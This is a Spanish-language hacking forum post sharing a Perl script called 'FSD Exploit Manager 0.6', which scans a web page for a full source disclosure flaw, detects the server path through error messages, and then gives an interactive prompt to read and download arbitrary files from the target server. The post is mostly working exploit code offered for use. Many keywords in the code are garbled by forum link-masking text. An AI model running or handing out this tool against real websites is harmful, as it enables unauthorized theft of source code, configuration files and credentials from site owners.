comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] FSD Exploit Manager 0.6

  • 0 Respuestas
  • 1448 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Febrero 20, 2015, 01:27:42 pm »
Un simple script en Perl para explotar la vulnerabilidad Full Source Discloure solo ponen el link de la pagina vulnerable con el path y pueden bajar archivos de forma facil con este script.

El codigo :

Código: Perl
  1. #!usr/bin/perl
  2. #FSD Exploit Manager 0.6
  3. #(C) Doddy Hackman 2014
  4.  
  5. use Getopt::Long;
  6. use Color::Output;
  7. Color::Output::Init;
  8. use LWP::UserAgent;
  9. use URI::Split No tienes permisos para ver links. Registrate o Entra con tu cuenta(uri_split);
  10. use File::Basename;
  11. use Cwd;
  12.  
  13. my $nave = LWP::UserAgent->new();
  14. $nave->agent( $agents[ No tienes permisos para ver links. Registrate o Entra con tu cuenta @agents ] );
  15. $nave->timeout(5);
  16.  
  17. installer();
  18.  
  19. GetOptions(
  20.     "scan=s" => \$scan,
  21.     "fpd"    => \$fpd,
  22.     "logs"   => \$logs,
  23.     "open"   => \$open
  24. );
  25.  
  26. head();
  27.  
  28. if ($scan) {
  29.  
  30.     my $page = $scan;
  31.  
  32.     printear("\n[+] Scanning target : ");
  33.     No tienes permisos para ver links. Registrate o Entra con tu cuenta $page. "\n\n";
  34.  
  35.     my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  36.  
  37.     my $me = basename($path);
  38.  
  39.     $code1 = toma( $page . $me );
  40.     if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) {
  41.         printear_titulo("[+] Vulnerable\n");
  42.         $code2 = toma( $page . "'" );
  43.         if (   $code2 =~ /No such file or directory in <b>(.*)<\/b> on line/
  44.             or $code2 =~
  45.             /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ )
  46.         {
  47.             my $ruta    = $1;
  48.             my $cambiar = basename($ruta);
  49.             $ruta =~ s/$cambiar//;
  50.  
  51.             my $prompt = "";
  52.  
  53.             if ($fpd) {
  54.                 printear("\n[+] Full Path Dislocure Detect : ");
  55.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta $ruta. "\n";
  56.                 $prompt = "[" . $ruta . "] > ";
  57.             }
  58.             else {
  59.                 $prompt = "[prompt] > ";
  60.             }
  61.  
  62.             unless ( -d $auth ) {
  63.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta( $auth, "0777" );
  64.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta 0777, $auth;
  65.             }
  66.             No tienes permisos para ver links. Registrate o Entra con tu cuenta($auth);
  67.  
  68.             printear("\n[+] File Downloader : ");
  69.             No tienes permisos para ver links. Registrate o Entra con tu cuenta "Ready\n";
  70.  
  71.             while (1) {
  72.                 $SIG{INT} = \&adios;
  73.                 printear_titulo( "\n" . $prompt );
  74.                 No tienes permisos para ver links. Registrate o Entra con tu cuenta( my $comando = <stdin> );
  75.                 if ( $comando =~ /!exit/ ) {
  76.                     adios();
  77.                 }
  78.                 elsif ( $comando =~ /!read_file (.*)/ ) {
  79.                     my $archivo = $1;
  80.                     my $code    = "";
  81.                     my $code    = toma( $page . $archivo );
  82.  
  83.                     printear_logo(
  84. "\n----------------------------------------------------\n"
  85.                     );
  86.                     printear_titulo($code);
  87.                     printear_logo(
  88. "\n----------------------------------------------------\n"
  89.                     );
  90.  
  91.                 }
  92.                 elsif ( $comando =~ /!download_file (.*)/ ) {
  93.                     my $archivo = $1;
  94.                     my $nombre  = basename($archivo);
  95.                     printear_titulo("\n[+] Downloading file : ");
  96.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta $nombre. "\n";
  97.                     if ( $nave->mirror( $page . $archivo, $nombre ) ) {
  98.                         printear("\n[+] File Downloaded\n");
  99.                         if ($open) {
  100.                             my $abrir = getcwd() . "/" . $nombre;
  101.                             if ( -f $abrir ) {
  102.                                 abrir_archivo($abrir);
  103.                             }
  104.                             if ( !No tienes permisos para ver links. Registrate o Entra con tu cuenta($logs) ) {
  105.                                 if ( -f $abrir ) {
  106.                                     No tienes permisos para ver links. Registrate o Entra con tu cuenta($abrir);
  107.                                 }
  108.                             }
  109.                         }
  110.  
  111.                     }
  112.                     else {
  113.                         printear("\n[-] File not downloaded\n");
  114.                     }
  115.                 }
  116.                 elsif ( $comando =~ /!help/ ) {
  117.                     printear( "\n[+] Commands : " . "\n\n" );
  118.                     printear("!download_file <file> : Download file\n");
  119.                     printear("!read_file <file> : Read File\n");
  120.                     printear("!help : Show commands\n");
  121.                     printear("!exit : To exit the program\n");
  122.                 }
  123.                 else {
  124.                     printear("\n[-] Command not found , try using !help\n");
  125.                 }
  126.  
  127.             }
  128.  
  129.         }
  130.     }
  131.     else {
  132.         printear_titulo("[-] Not vulnerable\n");
  133.     }
  134. }
  135. else {
  136.     sintax();
  137. }
  138.  
  139. copyright();
  140.  
  141. sub abrir_archivo {
  142.     my $os = $^O;
  143.     if ( $os =~ /Win32/ig ) {
  144.         No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(notepad.exe "$_[0]"));
  145.     }
  146.     else {
  147.         No tienes permisos para ver links. Registrate o Entra con tu cuenta(No tienes permisos para ver links. Registrate o Entra con tu cuenta(gedit '$_[0]'));
  148.     }
  149. }
  150.  
  151. sub printear {
  152.     cprint( "\x036" . $_[0] . "\x030" );
  153. }
  154.  
  155. sub printear_logo {
  156.     cprint( "\x037" . $_[0] . "\x030" );
  157. }
  158.  
  159. sub printear_titulo {
  160.     cprint( "\x0310" . $_[0] . "\x030" );
  161. }
  162.  
  163. sub sintax {
  164.     printear("\n[+] Sintax : ");
  165.     No tienes permisos para ver links. Registrate o Entra con tu cuenta "perl $0 <option> <value>\n";
  166.     printear("\n[+] Options : \n\n");
  167.     No tienes permisos para ver links. Registrate o Entra con tu cuenta "-scan <page> : FSD Exploit Scanner\n";
  168.     No tienes permisos para ver links. Registrate o Entra con tu cuenta "-fpd : Check Full Path Discloure\n";
  169.     No tienes permisos para ver links. Registrate o Entra con tu cuenta "-logs : Enable logs to save files downloaded\n";
  170.     No tienes permisos para ver links. Registrate o Entra con tu cuenta "-open : Enable open files downloaded\n";
  171.     printear("\n[+] Example : ");
  172.     No tienes permisos para ver links. Registrate o Entra con tu cuenta "perl fsd.pl -scan http://localhost/download.php?down= -fpd -logs\n";
  173.     copyright();
  174. }
  175.  
  176. sub installer {
  177.     unless ( -d "fsdlogs/" ) {
  178.         No tienes permisos para ver links. Registrate o Entra con tu cuenta( "fsdlogs/", "777" );
  179.         No tienes permisos para ver links. Registrate o Entra con tu cuenta 0777, "fsdlogs/";
  180.     }
  181.     No tienes permisos para ver links. Registrate o Entra con tu cuenta("fsdlogs");
  182. }
  183.  
  184. sub adios {
  185.     printear_titulo("\n\n[+] Good Bye\n");
  186.     copyright();
  187. }
  188.  
  189. sub head {
  190.     printear_logo("\n-- == FSD Exploit Manager 0.6 == --\n\n");
  191. }
  192.  
  193. sub copyright {
  194.     printear_logo("\n\n-- == (C) Doddy Hackman 2014 == --\n");
  195.     No tienes permisos para ver links. Registrate o Entra con tu cuenta(1);
  196. }
  197.  
  198. sub toma {
  199.     No tienes permisos para ver links. Registrate o Entra con tu cuenta $nave->get( $_[0] )->content;
  200. }
  201.  
  202. #The End ?
  203.  

Un video con ejemplos de uso :



Si quieren bajar el programa lo pueden hacer de aca :

No tienes permisos para ver links. Registrate o Entra con tu cuenta.
No tienes permisos para ver links. Registrate o Entra con tu cuenta.

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3164
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1477
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 1136
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 1277
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1253
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear